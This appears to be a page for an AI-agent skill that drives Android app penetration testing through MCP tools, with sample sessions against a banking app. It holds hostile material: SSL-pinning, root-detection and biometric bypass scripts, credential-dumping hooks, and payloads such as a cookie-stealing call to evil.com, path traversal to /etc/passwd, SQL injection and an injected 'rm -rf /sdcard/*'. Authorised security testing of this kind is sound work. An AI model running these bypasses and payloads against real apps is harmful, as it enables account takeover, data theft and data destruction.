Loading...
Loading...
Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments. (user)
npx skill4agent add hardw00t/ai-security-arsenal android-pentest| Tool | Purpose | Installation |
|---|---|---|
| ADB | Device communication | |
| Frida | Dynamic instrumentation | |
| Objection | Mobile exploration | |
| apktool | APK decompilation | |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |
// ~/.claude/mcp.json
{
"mcpServers": {
"android-pentest": {
"command": "python",
"args": ["/path/to/android-dynamic/server.py"]
}
}
}// Add to ~/.claude/mcp.json
{
"mcpServers": {
"mobile-mcp": {
"command": "npx",
"args": ["-y", "@anthropic/mobile-mcp", "--android"]
}
}
}# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)
# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)# Verify ADB connection
adb devices
# Verify root access
adb shell su -c "id"
# Verify Frida connection
frida-ps -U
# Test MCP server
# In Claude Code: get_app_info("com.android.settings")User: I need to pentest the app com.example.targetapp
Claude: I'll set up the testing environment.
[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
→ Version, permissions, SDK levels, signatures
2. pull_apk("com.example.targetapp")
→ Extract APK for static analysis
3. list_exported_components("com.example.targetapp")
→ Map attack surface (activities, services, providers, receivers)[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
→ PID: 12345
2. frida_bypass_ssl(12345)
→ SSL pinning disabled
3. frida_bypass_root(12345)
→ Root detection bypassed
4. setup_proxy("device-id", "192.168.1.100", 8080)
→ Traffic interception ready[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")| Document | Coverage |
|---|---|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |
# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")
# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)
# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")
# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")
# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
"data", ["../../../etc/passwd", "' OR '1'='1"])
# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
var CustomPinner = Java.use('com.target.app.security.Pinner');
CustomPinner.verify.implementation = function() {
console.log('[+] Bypassed custom pinner');
return true;
};
});
""")
# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
onEnter: function(args) {
args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
}
});
""")# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")
# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")
# Credential monitoring
frida_run_script(pid, "credential_hooks.js")
# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")# Map attack surface
components = list_exported_components("com.target.app")
# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
data_uri="targetapp://transfer?amount=1000&to=attacker")
# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})
# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
"../../../data/data/com.other.app/databases/secrets.db",
"file:///data/local/tmp/evil.html",
"content://com.target.app.provider/../../../etc/passwd"
])
# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")
# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
extras={"command": "; rm -rf /sdcard/*"})# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")
# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
var Cipher = Java.use('javax.crypto.Cipher');
Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
console.log('[CRYPTO] Algorithm: ' + algo);
if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
return this.getInstance(algo);
};
});
""")
# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")
# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")
# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs
# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
SharedPrefs.putString.implementation = function(key, value) {
console.log('[PREFS] ' + key + ' = ' + value);
return this.putString(key, value);
};
});
""")| Tool | Description | Example |
|---|---|---|
| Current screen/UI elements | Finding clickable elements |
| Tap at coordinates | Automating login flow |
| Type into focused field | Entering credentials |
| Press key | BACK=4, HOME=3, ENTER=66 |
| Swipe gesture | Scrolling, pattern unlock |
| Long press | Context menus |
| Tool | Description | Example |
|---|---|---|
| Start with Frida | Initial attachment |
| Attach to running | Already running app |
| Run Frida script | Custom hooks |
| Bypass SSL pinning | Enable interception |
| Bypass root detection | Evade security |
| Hook method | Trace calls |
| Trace crypto | Key extraction |
| Dump credentials | Credential theft |
| List classes | Class discovery |
| Search memory | Find secrets |
| Tool | Description | Example |
|---|---|---|
| Configure proxy | Burp interception |
| Remove proxy | Cleanup |
| Install CA cert | Trust Burp CA |
| Start capture | Record traffic |
| Stop capture | Save PCAP |
| Tool | Description | Example |
|---|---|---|
| Extract SQLite DBs | User data, creds |
| Get preferences | Tokens, settings |
| Internal files | Config, certs |
| SD card files | Exports, cache |
| Filtered logs | Debug info leak |
| Tool | Description | Example |
|---|---|---|
| Map attack surface | Find entry points |
| Start activity | Deep link test |
| Send broadcast | Broadcast injection |
| Start service | Service abuse |
| Query provider | Data leakage |
| Fuzz intents | Find vulns |
| Tool | Description | Example |
|---|---|---|
| Install APK | Deploy test build |
| Remove app | Cleanup |
| Clear data | Fresh state |
| App metadata | Permissions, SDK |
| All packages | Discovery |
| Extract APK | Static analysis |
/scripts/| Script | Purpose |
|---|---|
| Universal SSL/TLS pinning bypass |
| Root detection bypass |
| Cryptographic operation monitoring |
| Credential capture |
| Network traffic monitoring |
| Biometric authentication bypass |
| Anti-tampering/debugger bypass |
| Intent/IPC monitoring |
| WebView security monitoring |
| Dynamic code loading detection |
| Android Keystore monitoring |
| Generic method tracing |
# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name># Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app") # Instead of frida_attach# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*") # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.# Solution: Version mismatch
frida --version # Check client version
# Download matching server from https://github.com/frida/frida/releases# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook
# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threadsadb kill-server
adb start-server
# Accept prompt on deviceadb root # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..." # With root# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")
# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ") # Common patterns| Checklist | Purpose |
|---|---|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |
| Template | Purpose |
|---|---|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |
User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.
Claude: I'll set up the testing environment for com.megabank.mobile.
[Executes MCP tools]
1. Getting app information:
> get_app_info("com.megabank.mobile")
Version: 3.2.1, Target SDK: 33, Min SDK: 26
Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...
2. Extracting APK:
> pull_apk("com.megabank.mobile")
Saved to: /tmp/com.megabank.mobile.apk
3. Mapping attack surface:
> list_exported_components("com.megabank.mobile")
Exported Activities:
- com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
- com.megabank.mobile.ShareReceiveActivity
Content Providers:
- com.megabank.mobile.provider.DocumentProvider (exported)
Broadcast Receivers:
- com.megabank.mobile.PushReceiver
4. Starting with Frida and bypassing protections:
> frida_spawn("com.megabank.mobile")
PID: 12345
> frida_bypass_ssl(12345)
[+] SSL pinning bypass active - hooked 8 methods
> frida_bypass_root(12345)
[+] Root detection bypass active
5. Configuring traffic interception:
> setup_proxy("emulator-5554", "192.168.1.100", 8080)
[+] Proxy configured
Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection
Would you like me to proceed with dynamic analysis or test specific components?User: Check what sensitive data this app stores locally
Claude: I'll perform comprehensive data storage analysis.
[Executes MCP tools]
1. SharedPreferences analysis:
> dump_shared_prefs("com.megabank.mobile")
[!] FINDING in auth_prefs.xml:
- auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
- refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
- pin_hash: "5e884898da28047d9166..."
Severity: HIGH - Authentication tokens stored in plaintext
MASTG: MASTG-TEST-0001 (Insecure Data Storage)
2. Database analysis:
> dump_databases("com.megabank.mobile")
Found: app_data.db (356 KB)
[!] FINDING:
- Table 'accounts': account_number, balance, last_transaction
- Table 'transactions': 847 records with transaction history
- Table 'cached_credentials': username, password_hash
Severity: HIGH - Financial data in unencrypted database
MASTG: MASTG-TEST-0001
3. Internal storage:
> dump_internal_storage("com.megabank.mobile")
[!] FINDING: /files/user_profile.json
Contains: full_name, email, phone, ssn_last_4
Severity: MEDIUM - PII in plaintext file
4. External storage:
> dump_external_storage("com.megabank.mobile")
[!] FINDING: /Android/data/com.megabank.mobile/files/exports/
- statements_2024.pdf (world-readable)
Severity: MEDIUM - Sensitive docs on external storage
MASTG: MASTG-TEST-0003
Summary:
| Finding | Severity | MASTG ID |
|---------|----------|----------|
| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |User: Test the authentication for vulnerabilities
Claude: I'll test authentication mechanisms comprehensively.
[Executes MCP tools]
1. Hooking authentication flow:
> frida_run_script(12345, "credential_hooks.js")
[HOOK] SharedPreferences write: auth_token = eyJ...
[HOOK] HTTP Header: Authorization: Bearer eyJ...
2. Biometric testing:
> frida_run_script(12345, "biometric_bypass.js")
[HOOK] BiometricPrompt.authenticate() called
[BYPASS] Simulating successful authentication
[!] FINDING: Biometric bypass successful
- App accepts fake biometric success callback
- No server-side verification
Severity: HIGH - Authentication bypass
MASTG: MASTG-TEST-0015
3. Session analysis:
> frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
[HOOK] validateSession(): Only checks local JWT expiry
[HOOK] refreshSession(): No server round-trip
[!] FINDING: Client-side session validation
- JWT expiry can be modified locally
- Sessions never verified server-side
Severity: HIGH - Broken session management
MASTG: MASTG-TEST-0016
4. Token analysis:
> frida_run_script(12345, """
Java.perform(function() {
var JWT = Java.use('com.auth0.jwt.JWT');
JWT.decode.implementation = function(token) {
console.log('[JWT] ' + token);
return this.decode(token);
};
});
""")
[!] FINDING: JWT uses HS256 (weak algorithm)
[!] FINDING: JWT contains: account_id, role, permissions
Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |ssl_pinning_bypass.jsroot_bypass.jscrypto_hooks.jskeystore_hooks.jsmethod_tracer.jsextract_apk.pycontent_provider_scanner.pyintent_fuzzer.pyowasp_mobile_top10.mdandroid_security_checklist.mdfrida_snippets.md